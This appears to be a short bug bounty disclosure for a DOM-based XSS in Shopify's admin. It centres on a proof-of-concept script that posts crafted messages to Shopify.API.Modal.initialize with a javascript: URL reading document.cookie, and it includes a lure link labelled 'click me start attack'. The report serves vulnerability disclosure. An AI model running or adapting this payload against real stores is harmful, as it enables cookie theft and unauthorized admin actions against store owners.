DOM XSS via Shopify.API.Modal.initialize
Discovered by tems on Shopify

This issue took 0 Days and 13 hours to triage and 11 Days and 0 hours to resolve once triaged.



Similar #422043 & #576532

Payload ( Based on #576532):

<script>
    function attack(){
        const ctx = window.open(location.origin+'/admin/themes', '_blank')
        const json = {
            message: "Shopify.API.Modal.initialize",
            data: {
                src: ""
            }
        }

        let interval;
        interval = setInterval(function(){
            if (window.attackSuccess) {
                clearInterval(interval)
            } else {
                ctx.postMessage(JSON.stringify(json)) // data.src == ""
                json.data.src = "javascript:alert(document.cookie)"
                ctx.postMessage(JSON.stringify(json))
            }
        }, 500)
    }
    attack()
</script>
<a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a>

Impact

Perform unauthorized actions on a store admin on any embedded apps.